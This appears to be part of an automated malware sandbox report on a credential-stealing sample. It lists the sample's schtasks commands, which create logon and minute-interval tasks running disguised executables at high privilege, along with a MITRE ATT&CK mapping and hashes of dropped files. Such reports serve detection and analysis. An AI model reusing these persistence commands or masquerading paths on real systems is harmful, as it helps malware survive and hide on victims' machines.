- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Umbral.exe

Filesize
229KB

MD5
38b0b23e5e7af5f4474e6050988ed475

SHA1
65ff163e96746d21b8bab4bd42d39793e35d84f4

SHA256
0b82a77683c4c8139f9abae41acf31b444a276130b0196e2d04a8c9bd3e75e89

SHA512
490f7d68b81128211909333453863ec7e09c66791d263b4f5365167fae27799446d170ee2547ef92576a12088584d4097b93d288ae9f347c06fe08c7013a4677

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
f4bf3ca8753d6bb9725419fec1ec74b9

SHA1
71fce9d17d1d92873236a9a827c52eb9e4827f3d

SHA256
ca8697e4ada4c3d4aac2899b8aad4052ccd605fccee05ee0a831368bde2f7417

SHA512
a55a107ae8bcf833ea674413c765cd55096146c9634dff41884fcc851c12fe47753308099525c99ae44883facfb668c8b292dd915263f34ebd1190391cb28a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
227556da5e65f6819f477756808c17e4

SHA1
6ffce766e881ca2a60180bb25f4981b183f78279

SHA256
101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4

SHA512
d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
567d7fef99fd45b4def9fa7b093384e2

SHA1
e6a0a4657276cca5142193ad980e34d1ed382f41

SHA256
7ec7b5f3f860f6b4a326dcc883a2bd3f57bac0a5774418b48e3ef54c2cd2893c

SHA512
f45b7876ae0e3eac9dee187f2b901da361caf20e2aebc545408a95f6926a2b3a13233392d085487a76e6972784877637576bf8f9b644c0d59cea02f9177aa711

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aub1izln.tpd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\bridgeproviderserversaves\chainreview.exe

Filesize
829KB

MD5
6809aade51a25f91207b187248c21e88

SHA1
3b43ffdb8148bb0e310f51a1b4329ecba1a33039

SHA256
746a9b2b1296487e4986c952ec3334d743ce719363defed52290e24d25d6cd45

SHA512
887810c38c81df5cee6fd270fed327e74ff4118f19fd39c3b43ccbed31cb77e645e44847be20606a589681985fe0b7dfeb6b92db2482e1d706bc4116f809f0c3

Download Submit
C:\bridgeproviderserversaves\rouG4W2xD34WsMh.bat

Filesize
46B

MD5
c99a2ff4e069e34baeed4225d8ef83f0

SHA1
8a0a4321fd7a31d76920862b556a2ab9a142387b

SHA256
52e3b987cc6323d73b28717b914744b9862a7e542ee718124cb440c4fd37f154

SHA512
410c5f035761a36baeff4b2f77f1bee7f3e78d177850df554ea5a45adb30e9f8907b48a568856b0730193866681d4edd4b00ec6f8c0191a8bd67910dbdf12ec9

Download Submit
C:\bridgeproviderserversaves\tGLyZfX8Rw.vbe

Filesize
217B

MD5
e3a2d8d35c59f56f4599b92c22438498

SHA1
330d80806692c77506b71a39ffd7d2db0f133343

SHA256
806cd2b79d72d6cb1545dbf06bf9670f78fd6fd9250d4ff50c1ab9cde64b562d

SHA512
bed1d43e70950cdca282a2fab823e34e6e5d2e72395519d260376519d898021c746f0bb654886672d5ebac1a10ac503d292160b626dd13e27f5a8ee9cd76ab2a

Download Submit
memory/4084-62-0x000001DFA8070000-0x000001DFA8092000-memory.dmp

Filesize
136KB

Download
memory/4520-12-0x00007FFBC40F3000-0x00007FFBC40F5000-memory.dmp

Filesize
8KB

Download
memory/4520-13-0x0000000000F70000-0x0000000001046000-memory.dmp

Filesize
856KB

Download
memory/4956-89-0x0000027C3E670000-0x0000027C3E6C0000-memory.dmp

Filesize
320KB

Download
memory/4956-90-0x0000027C3E770000-0x0000027C3E78E000-memory.dmp

Filesize
120KB

Download
memory/4956-88-0x0000027C3E6F0000-0x0000027C3E766000-memory.dmp

Filesize
472KB

Download
memory/4956-61-0x0000027C23F80000-0x0000027C23FC0000-memory.dmp

Filesize
256KB

Download
memory/4956-126-0x0000027C25E80000-0x0000027C25E8A000-memory.dmp

Filesize
40KB

Download
memory/4956-127-0x0000027C3E790000-0x0000027C3E7A2000-memory.dmp

Filesize
72KB

Download